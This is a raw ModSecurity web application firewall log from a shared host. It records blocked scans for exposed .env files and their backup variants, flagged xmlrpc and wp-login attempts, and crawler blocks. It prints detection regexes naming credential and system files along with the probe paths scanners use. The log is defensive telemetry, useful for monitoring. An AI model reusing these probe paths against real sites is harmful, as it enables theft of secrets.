[Tue May 26 15:33:12.834423 2026] [security2:error] [pid 724639:tid 724771] [client 142.248.80.222:20678] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/backend/.env"] [unique_id "ahVv4BKJRbiNp3eWdT1xuwAAAIc"]
[Tue May 26 15:33:12.835273 2026] [security2:error] [pid 724639:tid 724792] [client 142.248.80.222:20636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/api/.env"] [unique_id "ahVv4BKJRbiNp3eWdT1xtwAAAJw"]
[Tue May 26 15:33:12.847512 2026] [security2:error] [pid 724639:tid 724832] [client 142.248.80.222:39040] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env"] [unique_id "ahVv4BKJRbiNp3eWdT1xvQAAAMQ"]
[Tue May 26 15:33:12.886405 2026] [security2:error] [pid 724639:tid 724853] [client 113.190.129.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv4BKJRbiNp3eWdT1xqgAAANk"]
[Tue May 26 15:33:15.165055 2026] [security2:error] [pid 724639:tid 724817] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv4hKJRbiNp3eWdT1yDQAAALU"]
[Tue May 26 15:33:15.411777 2026] [security2:error] [pid 724639:tid 724839] [client 142.248.80.222:20728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.production.copy"] [unique_id "ahVv4xKJRbiNp3eWdT1yHgAAAMs"]
[Tue May 26 15:33:16.620982 2026] [security2:error] [pid 724639:tid 724884] [client 142.248.80.222:21112] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.production.swp"] [unique_id "ahVv5BKJRbiNp3eWdT1ySAAAAPg"]
[Tue May 26 15:33:16.621620 2026] [security2:error] [pid 724639:tid 724842] [client 142.248.80.222:21066] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.production.old"] [unique_id "ahVv5BKJRbiNp3eWdT1yRwAAAM4"]
[Tue May 26 15:33:16.621645 2026] [security2:error] [pid 724639:tid 724777] [client 142.248.80.222:21120] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.production.orig"] [unique_id "ahVv5BKJRbiNp3eWdT1ySgAAAI0"]
[Tue May 26 15:33:16.622407 2026] [security2:error] [pid 724639:tid 724830] [client 142.248.80.222:20920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.bak"] [unique_id "ahVv5BKJRbiNp3eWdT1ySwAAAMI"]
[Tue May 26 15:33:16.622506 2026] [security2:error] [pid 724639:tid 724862] [client 142.248.80.222:21038] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.local.orig"] [unique_id "ahVv5BKJRbiNp3eWdT1yUAAAAOI"]
[Tue May 26 15:33:16.622643 2026] [security2:error] [pid 724639:tid 724884] [client 142.248.80.222:21008] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.local~"] [unique_id "ahVv5BKJRbiNp3eWdT1yUgAAAPg"]
[Tue May 26 15:33:16.622716 2026] [security2:error] [pid 724639:tid 724881] [client 142.248.80.222:21082] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.production.backup"] [unique_id "ahVv5BKJRbiNp3eWdT1yTAAAAPU"]
[Tue May 26 15:33:16.623044 2026] [security2:error] [pid 724639:tid 724823] [client 142.248.80.222:21050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.local.copy"] [unique_id "ahVv5BKJRbiNp3eWdT1yTgAAALs"]
[Tue May 26 15:33:16.623165 2026] [security2:error] [pid 724639:tid 724819] [client 142.248.80.222:21052] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.production.bak"] [unique_id "ahVv5BKJRbiNp3eWdT1yTwAAALc"]
[Tue May 26 15:33:16.624007 2026] [security2:error] [pid 724639:tid 724770] [client 142.248.80.222:21024] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.local.swp"] [unique_id "ahVv5BKJRbiNp3eWdT1yUQAAAIY"]
[Tue May 26 15:33:16.624867 2026] [security2:error] [pid 724639:tid 724836] [client 142.248.80.222:21104] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.production~"] [unique_id "ahVv5BKJRbiNp3eWdT1yRgAAAMg"]
[Tue May 26 15:33:16.625219 2026] [security2:error] [pid 724639:tid 724778] [client 142.248.80.222:20990] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.local.backup"] [unique_id "ahVv5BKJRbiNp3eWdT1yVAAAAI4"]
[Tue May 26 15:33:16.626003 2026] [security2:error] [pid 724639:tid 724780] [client 142.248.80.222:20966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.orig"] [unique_id "ahVv5BKJRbiNp3eWdT1yVQAAAJA"]
[Tue May 26 15:33:16.626032 2026] [security2:error] [pid 724639:tid 724789] [client 142.248.80.222:20986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.local.old"] [unique_id "ahVv5BKJRbiNp3eWdT1yVgAAAJk"]
[Tue May 26 15:33:16.626897 2026] [security2:error] [pid 724639:tid 724859] [client 142.248.80.222:20978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.local.bak"] [unique_id "ahVv5BKJRbiNp3eWdT1yVwAAAN8"]
[Tue May 26 15:33:16.627106 2026] [security2:error] [pid 724639:tid 724849] [client 142.248.80.222:20976] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.copy"] [unique_id "ahVv5BKJRbiNp3eWdT1yWAAAANU"]
[Tue May 26 15:33:16.627154 2026] [security2:error] [pid 724639:tid 724876] [client 142.248.80.222:20962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.swp"] [unique_id "ahVv5BKJRbiNp3eWdT1yWQAAAPA"]
[Tue May 26 15:33:16.627539 2026] [security2:error] [pid 724639:tid 724874] [client 142.248.80.222:20958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env~"] [unique_id "ahVv5BKJRbiNp3eWdT1yWgAAAO4"]
[Tue May 26 15:33:16.628684 2026] [security2:error] [pid 724639:tid 724787] [client 142.248.80.222:20934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.old"] [unique_id "ahVv5BKJRbiNp3eWdT1yWwAAAJc"]
[Tue May 26 15:33:16.629278 2026] [security2:error] [pid 724639:tid 724893] [client 142.248.80.222:20926] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/.env.backup"] [unique_id "ahVv5BKJRbiNp3eWdT1yXAAAAQE"]
[Tue May 26 15:33:17.391768 2026] [security2:error] [pid 724639:tid 724783] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv5BKJRbiNp3eWdT1yYwAAAJM"]
[Tue May 26 15:33:20.134792 2026] [security2:error] [pid 724639:tid 724814] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv5xKJRbiNp3eWdT1yrQAAALI"]
[Tue May 26 15:33:20.670886 2026] [security2:error] [pid 724639:tid 724787] [client 74.7.230.9:47354] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.athelstan.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVv6BKJRbiNp3eWdT1yxQAAl38"]
[Tue May 26 15:33:20.711331 2026] [security2:error] [pid 724639:tid 724804] [client 74.7.228.14:46438] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.athelstan.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVv6BKJRbiNp3eWdT1yyAAAqHo"]
[Tue May 26 15:33:22.602224 2026] [security2:error] [pid 724639:tid 724894] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv6hKJRbiNp3eWdT1y9gAAAQI"]
[Tue May 26 15:33:24.690395 2026] [security2:error] [pid 724639:tid 724895] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv7BKJRbiNp3eWdT1zKwAAAQM"]
[Tue May 26 15:33:27.431259 2026] [security2:error] [pid 724639:tid 724895] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv7xKJRbiNp3eWdT1zbQAAAQM"]
[Tue May 26 15:33:29.538977 2026] [security2:error] [pid 724639:tid 724812] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv8RKJRbiNp3eWdT1zqgAAALA"]
[Tue May 26 15:33:30.937988 2026] [security2:error] [pid 724639:tid 724883] [client 74.7.244.11:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ameritradeng.com.thedebateafrica.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVv8hKJRbiNp3eWdT1z6QAAAPc"]
[Tue May 26 15:33:30.938723 2026] [security2:error] [pid 724639:tid 724852] [client 74.7.244.11:59216] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ameritradeng.com.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahVv8hKJRbiNp3eWdT1z5wAA2H4"]
[Tue May 26 15:33:31.303198 2026] [security2:error] [pid 724639:tid 724818] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv8hKJRbiNp3eWdT1z5gAAALY"]
[Tue May 26 15:33:32.503832 2026] [security2:error] [pid 724639:tid 724803] [client 223.123.35.47:62452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVv9BKJRbiNp3eWdT10GQAAAKc"]
[Tue May 26 15:33:32.503963 2026] [security2:error] [pid 724639:tid 724803] [client 223.123.35.47:62452] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVv9BKJRbiNp3eWdT10GQAAAKc"]
[Tue May 26 15:33:33.714805 2026] [security2:error] [pid 724639:tid 724853] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv9RKJRbiNp3eWdT10OQAAANk"]
[Tue May 26 15:33:34.030158 2026] [security2:error] [pid 724639:tid 724792] [client 47.128.17.248:22544] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahVv9hKJRbiNp3eWdT10TgAAAJw"]
[Tue May 26 15:33:36.611335 2026] [security2:error] [pid 724639:tid 724775] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv-BKJRbiNp3eWdT10kgAAAIs"]
[Tue May 26 15:33:38.811334 2026] [security2:error] [pid 724639:tid 724796] [client 202.76.185.144:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv-hKJRbiNp3eWdT100AAAAKA"]
[Tue May 26 15:33:38.860287 2026] [security2:error] [pid 724639:tid 724862] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv-hKJRbiNp3eWdT102QAAAOI"]
[Tue May 26 15:33:40.762190 2026] [security2:error] [pid 724639:tid 724881] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv_BKJRbiNp3eWdT11DwAAAPU"]
[Tue May 26 15:33:40.781648 2026] [security2:error] [pid 724639:tid 724793] [client 103.247.15.68:42222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "xllent.in"] [uri "/index.php"] [unique_id "ahVv_BKJRbiNp3eWdT11BgAAAJ0"]
[Tue May 26 15:33:41.516277 2026] [security2:error] [pid 724639:tid 724888] [client 178.20.45.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVv_RKJRbiNp3eWdT11MQAAAPw"], referer: http://anujtradingco.com/pages/about-wide/
[Tue May 26 15:33:41.841418 2026] [security2:error] [pid 724639:tid 724837] [client 223.123.35.47:62453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVv_RKJRbiNp3eWdT11MwAAAMk"]
[Tue May 26 15:33:41.841622 2026] [security2:error] [pid 724639:tid 724837] [client 223.123.35.47:62453] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVv_RKJRbiNp3eWdT11MwAAAMk"]
[Tue May 26 15:33:43.609099 2026] [security2:error] [pid 724639:tid 724890] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv_xKJRbiNp3eWdT11YgAAAP4"]
[Tue May 26 15:33:45.479466 2026] [security2:error] [pid 724639:tid 724817] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwARKJRbiNp3eWdT11ngAAALU"]
[Tue May 26 15:33:47.803259 2026] [security2:error] [pid 724639:tid 724834] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwAxKJRbiNp3eWdT116AAAAMY"]
[Tue May 26 15:33:48.424643 2026] [security2:error] [pid 724639:tid 724751] [remote 88.198.165.116:47480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVwBBKJRbiNp3eWdT11_AAAw28"]
[Tue May 26 15:33:50.721071 2026] [security2:error] [pid 724639:tid 724878] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwBhKJRbiNp3eWdT12MgAAAPI"]
[Tue May 26 15:33:52.968937 2026] [security2:error] [pid 724639:tid 724878] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwCBKJRbiNp3eWdT12bgAAAPI"]
[Tue May 26 15:33:54.940460 2026] [security2:error] [pid 724639:tid 724813] [client 85.208.96.206:50852] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-20th/day/2022-03-11/"] [unique_id "ahVwChKJRbiNp3eWdT12sgAAALE"]
[Tue May 26 15:33:54.940603 2026] [security2:error] [pid 724639:tid 724813] [client 85.208.96.206:50852] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-20th/day/2022-03-11/"] [unique_id "ahVwChKJRbiNp3eWdT12sgAAALE"]
[Tue May 26 15:33:55.288928 2026] [security2:error] [pid 724639:tid 724776] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwChKJRbiNp3eWdT12sQAAAIw"]
